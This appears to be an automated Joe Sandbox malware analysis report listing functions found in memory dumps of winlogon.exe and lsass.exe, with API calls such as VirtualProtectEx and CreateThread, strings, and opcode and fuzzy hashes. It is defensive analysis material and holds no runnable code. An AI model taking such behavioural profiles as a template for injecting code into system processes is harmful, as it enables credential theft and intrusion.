Source File: 00000018.00000002.3734450076.000001881F8B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001881F8B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f8b0000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 9dc5438cd04fad170f0fb425abaabe7b262c998b8a5d938981f2e709a7d07be4
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: DE519A326226088EEB24DF25E84CF993795F365B98F91C124DA1A47788EF34DA83C704

Function 000001881F8584F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001881F858503
_IsNonwritableInCurrentImage.LIBCMT ref: 000001881F858598

Strings

csm, xrefs: 000001881F85857E
f, xrefs: 000001881F858516

Memory Dump Source

Source File: 00000018.00000002.3733356140.000001881F850000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f850000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: d5dfb30af38a87de86dcf31a6242d8e4c4a60306a54a42c07bcd3a441aca561a
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 2A519B726226008FEB24CF25E84CF993795F3A4B98F95C126DA57477A8EF34DA42C704

Function 000001881F8B84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001881F8B8503
_IsNonwritableInCurrentImage.LIBCMT ref: 000001881F8B8598

Strings

csm, xrefs: 000001881F8B857E
f, xrefs: 000001881F8B8516

Memory Dump Source

Source File: 00000018.00000002.3734450076.000001881F8B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001881F8B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f8b0000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 065d90133aaf38687c3e09ae94c770dde352784394b8c1c217d2f1be76694f5f
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: CE317A722256449EEB24DF12EC8CF9937A4F760B98F95C114AE5A07789DF38CA43C709

Function 000001881F8584D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001881F858503
_IsNonwritableInCurrentImage.LIBCMT ref: 000001881F858598

Strings

csm, xrefs: 000001881F85857E
f, xrefs: 000001881F858516

Memory Dump Source

Source File: 00000018.00000002.3733356140.000001881F850000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f850000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: f9901f8cc88010a43ac4794d71594ba04f45461c5ce4e8f637e75b66aea80d7e
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 043168722216408BEB24DF12E84CF9937A4F760B98F95C115AE5B477A5DF38CA42C708

Function 000001881F8814B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001881F8814D5
HeapFree.KERNEL32 ref: 000001881F8814E4
GetProcessHeap.KERNEL32 ref: 000001881F8814F0
HeapFree.KERNEL32 ref: 000001881F8814FF
GetProcessHeap.KERNEL32 ref: 000001881F88152A

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: f6d12f743daa531661d67c8d0c6aa9b40bb3fa98b29ef9a3726c759b29aa9ec0
Instruction ID: d49228d8660cc989fcd7003db7c3de454aaa4add5f3ee2eb0c19c4cb8683e8a1
Opcode Fuzzy Hash: f6d12f743daa531661d67c8d0c6aa9b40bb3fa98b29ef9a3726c759b29aa9ec0
Instruction Fuzzy Hash: F9119E71114F88DAE7649F66B80869A7374F3D9F84F449029EB8A03774DF38C602C700

Function 000001881F8826F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001881F8827D4
StrCpyW.SHLWAPI ref: 000001881F8827ED

Strings

\\.\pipe\, xrefs: 000001881F8827DF

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 80a85961243eb0c5a01992ad5ed9f75a8ec056b49f3abfdad6256e2486055552
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: A9719E32314BC18AEB749F259D5CBEAA790F7A5B84F848016DE4943B99DF35CB06C700

Function 000001881F8824DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001881F8825C3
StrCpyW.SHLWAPI ref: 000001881F8825DA

Strings

\\.\pipe\, xrefs: 000001881F8825CE

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 909000d0f23bde33c7a1650556a29c08502eb70f6f3f4be498055adc291c54bc
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: F35108322187818BE674DF69A55CBEE6691F3A5780FC4C025CE8A43B99CF35CA07CB40

Function 000001881F890604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001881F89071B
GetLastError.KERNEL32 ref: 000001881F89073D

Strings

U, xrefs: 000001881F8906C7

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 6d25bf680e40df2f0f635bcf2f3f58ff09da09c79ab895a0179f3352bd4d4ba6
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 2641A4B2314B4099EB209F65E4487DA67A0F3E8794F808025EE4D87794DF38C642CB40

Function 000001881F88D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001881F88D6F9
LCMapStringW.KERNEL32 ref: 000001881F88D781

Strings

LCMapStringEx, xrefs: 000001881F88D6DC, 000001881F88D6ED

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: f65a0a17a91659f904207c9370b3cf961a60c32eae4e6e456fde8c25a526d996
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 96114A76208BC08AD770DF16F44469AB7A4F7D8B80F948126EE8D83B19DF38C641CB40

Function 000001881F8894A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001881F8894E8
RaiseException.KERNEL32 ref: 000001881F88952E

Strings

csm, xrefs: 000001881F88951B

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: fa6421ae24464f13719279572e27b9097a5a8a95cf127d150829a275621c26cd
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 7B112132214B8086EB618F15F84479977A5F798F98F588225DF8E07765DF3CCA56CB00

Function 000001881F88D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001881F88D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000001881F88D6A7

Strings

InitializeCriticalSectionEx, xrefs: 000001881F88D681

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: ef6dd5aaa62c18367947ef19ff640f9645b700e5d92fa5b765d7a0fcb6763851
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: A8F0E27671078086E7249F45F408AD52320BBD8B90FC8E025A94D03F54CF38CB97C740

Function 000001881F8BCB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001881F8BCBC5

Strings

October, xrefs: 000001881F8BCBBE
November, xrefs: 000001881F8BCBA8, 000001881F8BCBB2

Memory Dump Source

Source File: 00000018.00000002.3734450076.000001881F8B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001881F8B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f8b0000_winlogon.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: c189e72dc1625640a247f38dc487753dbcaff5c26c4d6c73c5af2de74a906a7c
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 68E092312009499AFB359B59F449AE92321DBB4B40FD9D022E55906292CE38CAC78300

Function 000001881F88D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001881F88D631
TlsSetValue.KERNEL32 ref: 000001881F88D648

Strings

FlsSetValue, xrefs: 000001881F88D61E

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: ba8fcc2d827356cfe62d28fc5bb1cc8b92572c7248ed43b0cf2d748a5007ed99
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: F9E092B26006409AEB249F54F80CED42322BBE8784FC8E126D90906755CF38CB97C740

Function 000001881F85CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001881F85CBC5

Strings

November, xrefs: 000001881F85CBA8, 000001881F85CBB2
October, xrefs: 000001881F85CBBE

Memory Dump Source

Source File: 00000018.00000002.3733356140.000001881F850000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f850000_winlogon.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: d6483892f3c9c5a235815d11e2e7de07310dd20c85a520885fbe7c3e8b1a94a2
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: A5E092312109419BEB659B69F848AE832A2DBB4750FD9D121952A062A2CE38CB878701

Function 000001881F881D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001881F881D9B
HeapAlloc.KERNEL32 ref: 000001881F881DAA
GetProcessHeap.KERNEL32 ref: 000001881F881E1E
HeapFree.KERNEL32 ref: 000001881F881E2C

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 18eda82bf7a6b50c54d17138dcb02e6840414a06efff11305da6115e7038f1fb
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 3D218132604F808AEB618F59E40869AF3A0FBD8B94F858111EE8D47B24EE78C643C700

Function 000001881F881274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001881F88127A
HeapAlloc.KERNEL32 ref: 000001881F881289
GetProcessHeap.KERNEL32 ref: 000001881F8812A3
HeapAlloc.KERNEL32 ref: 000001881F8812B4

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 6e4cdb68eb165fe4d7bc292e22676b5b6c856ef1a06aa6ca19e83ce506161149
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: B8E092B1611600CAEB148F62D80878936E5FBDCF05F88D024D90907370DF7D86DAC740

Analysis Process: lsass.exePID: 640, Parent PID: 5852COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	101
Total number of Limit Nodes:	13

Executed Functions

Function 00000264CDE626F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32 ref: 00000264CDE627D4
StrCpyW.SHLWAPI ref: 00000264CDE627ED

Strings

\\.\pipe\, xrefs: 00000264CDE627DF

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: f28cf73ec19b0ca3206769437c4d8f6519be5d4351a986695285499900dfccb2
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 9A71AE32202F8986EB64BE299D583EAE6A0F795B84F444017DE8943BD9DE36C606C700

Function 00000264CDE621CC Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 00000264CDE62270

Part of subcall function 00000264CDE630B4: GetProcessHeap.KERNEL32 ref: 00000264CDE630D7
Part of subcall function 00000264CDE630B4: HeapAlloc.KERNEL32 ref: 00000264CDE630EA
Part of subcall function 00000264CDE630B4: StrCmpNIW.SHLWAPI ref: 00000264CDE6316B
Part of subcall function 00000264CDE630B4: GetProcessHeap.KERNEL32 ref: 00000264CDE631D1
Part of subcall function 00000264CDE630B4: HeapFree.KERNEL32 ref: 00000264CDE631DF

Strings

S, xrefs: 00000264CDE62391
dialer, xrefs: 00000264CDE62269

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: S$dialer
API String ID: 756756679-3873981283
Opcode ID: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
Instruction ID: 6609c0ab007616ae0be423e29603c3dbdf6e23f56b2a44e76f2764f47b2ccd8f
Opcode Fuzzy Hash: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
Instruction Fuzzy Hash: FE51B532B52F2986F761EF259C486EEA3E4F714B84F449422DE8517BC4DB36C852C310

Function 00000264CDE61AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000264CDE61AD8
StrCmpNIW.SHLWAPI ref: 00000264CDE61AF2
lstrlenW.KERNEL32 ref: 00000264CDE61B01
StrCpyW.SHLWAPI ref: 00000264CDE61B16

Strings

\\?\, xrefs: 00000264CDE61AE6

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: eb5bf1098a5f8cbfa4b64006e44426698f475742610d87e9b3c204255b9d1736
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 7AF04432305E4592E7A0AB21F8D8359A761F754B88F848022CAD947A94DF2EC689C700

Function 00000264CDE60346 Relevance: 6.0, APIs: 4, Instructions: 1034
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000264CDE61006
HeapAlloc.KERNEL32 ref: 00000264CDE61015
GetProcessHeap.KERNEL32 ref: 00000264CDE61028
HeapAlloc.KERNEL32 ref: 00000264CDE61037

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: da3653941ee27b4032445f916b986651388196774474ecb5996340d1f59d089c
Instruction ID: 3ef668298cc3211904affbb4a7d56a6f6abfc6eeed13d097533cf8d45377c62a
Opcode Fuzzy Hash: da3653941ee27b4032445f916b986651388196774474ecb5996340d1f59d089c
Instruction Fuzzy Hash: 46F06D7251ABC08BD3469B728C1425DBFB0FB8AF00F8EC157C68443792DE2D889AC711

Function 00000264CDE61274 Relevance: 5.0, APIs: 4, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000264CDE6127A
HeapAlloc.KERNEL32 ref: 00000264CDE61289
GetProcessHeap.KERNEL32 ref: 00000264CDE612A3
HeapAlloc.KERNEL32 ref: 00000264CDE612B4

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 76c1f5bb03d58f46897f2ee71011a33b5f64d2ab4881c83e70fc207b91042a58
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 75E09271612A00C6E784AF62D808349B7E1FB9DF01F4AC024C99907390DF7E84D9C740

Function 00000264CDE61000 Relevance: 5.0, APIs: 4, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000264CDE61006
HeapAlloc.KERNEL32 ref: 00000264CDE61015
GetProcessHeap.KERNEL32 ref: 00000264CDE61028
HeapAlloc.KERNEL32 ref: 00000264CDE61037

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 3942458b2e602a87a53f3a6f36558e5fd963b0420189fb76057d3a0940dc335f
Instruction ID: 091389e67fbdf3683255cfedb9d91a2954c8b4432441c4000f37e787bff5df4b
Opcode Fuzzy Hash: 3942458b2e602a87a53f3a6f36558e5fd963b0420189fb76057d3a0940dc335f
Instruction Fuzzy Hash: 1DE01271622A00C7E788AF66DC08359B7E1FB9DF11F498025C95907754DE3D84D5C710

Function 00000264CDE63458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000264CDE6347A
PathFindFileNameW.SHLWAPI ref: 00000264CDE63489

Part of subcall function 00000264CDE63930: StrCmpNIW.SHLWAPI ref: 00000264CDE63948

Part of subcall function 00000264CDE63878: GetModuleHandleW.KERNEL32 ref: 00000264CDE63886
Part of subcall function 00000264CDE63878: GetCurrentProcess.KERNEL32 ref: 00000264CDE638B4
Part of subcall function 00000264CDE63878: VirtualProtectEx.KERNEL32 ref: 00000264CDE638D6
Part of subcall function 00000264CDE63878: GetCurrentProcess.KERNEL32 ref: 00000264CDE638F4
Part of subcall function 00000264CDE63878: VirtualProtectEx.KERNEL32 ref: 00000264CDE63915

CreateThread.KERNEL32 ref: 00000264CDE634D7

Part of subcall function 00000264CDE61EB4: GetCurrentThread.KERNEL32 ref: 00000264CDE61EBF

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: d9ba5028b9f3b0c34ad6a1278e7c782b2ddd6352c988b7bdeccf8af5360a89fd
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 67118075622E4A82F7A5B721BD0E759F290FBA4705F49102BDAD6853D4EF3FC086C610

Function 00000264CDE61C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000264CDE61650: GetProcessHeap.KERNEL32 ref: 00000264CDE6165B
Part of subcall function 00000264CDE61650: HeapAlloc.KERNEL32 ref: 00000264CDE6166A
Part of subcall function 00000264CDE61650: RegOpenKeyExW.ADVAPI32 ref: 00000264CDE616DA
Part of subcall function 00000264CDE61650: RegOpenKeyExW.ADVAPI32 ref: 00000264CDE61707
Part of subcall function 00000264CDE61650: RegCloseKey.ADVAPI32 ref: 00000264CDE61721
Part of subcall function 00000264CDE61650: RegOpenKeyExW.ADVAPI32 ref: 00000264CDE61741
Part of subcall function 00000264CDE61650: RegCloseKey.ADVAPI32 ref: 00000264CDE6175C
Part of subcall function 00000264CDE61650: RegOpenKeyExW.ADVAPI32 ref: 00000264CDE6177C
Part of subcall function 00000264CDE61650: RegCloseKey.ADVAPI32 ref: 00000264CDE61797
Part of subcall function 00000264CDE61650: RegOpenKeyExW.ADVAPI32 ref: 00000264CDE617B7
Part of subcall function 00000264CDE61650: RegCloseKey.ADVAPI32 ref: 00000264CDE617D2
Part of subcall function 00000264CDE61650: RegOpenKeyExW.ADVAPI32 ref: 00000264CDE617F2

Sleep.KERNEL32 ref: 00000264CDE61C43
SleepEx.KERNELBASE ref: 00000264CDE61C49

Part of subcall function 00000264CDE61650: RegCloseKey.ADVAPI32 ref: 00000264CDE6180D
Part of subcall function 00000264CDE61650: RegOpenKeyExW.ADVAPI32 ref: 00000264CDE6182D
Part of subcall function 00000264CDE61650: RegCloseKey.ADVAPI32 ref: 00000264CDE61848
Part of subcall function 00000264CDE61650: RegOpenKeyExW.ADVAPI32 ref: 00000264CDE61868
Part of subcall function 00000264CDE61650: RegCloseKey.ADVAPI32 ref: 00000264CDE61883
Part of subcall function 00000264CDE61650: RegOpenKeyExW.ADVAPI32 ref: 00000264CDE618A3
Part of subcall function 00000264CDE61650: RegCloseKey.ADVAPI32 ref: 00000264CDE618BE
Part of subcall function 00000264CDE61650: RegCloseKey.ADVAPI32 ref: 00000264CDE618C8

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 7f7c0a00123efa303fd247e51c817c879983dde63acfd1f906e1252d9c000a10
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 5C313075602E0991FB52BF36EE4935EE3A4AB44BC2F044427CE8DC77D6EE22C852C250

Function 00000264CD7C2908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000264CD7C2A31

Memory Dump Source

Source File: 0000001C.00000002.3740227777.00000264CD7C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CD7C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cd7c0000_lsass.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
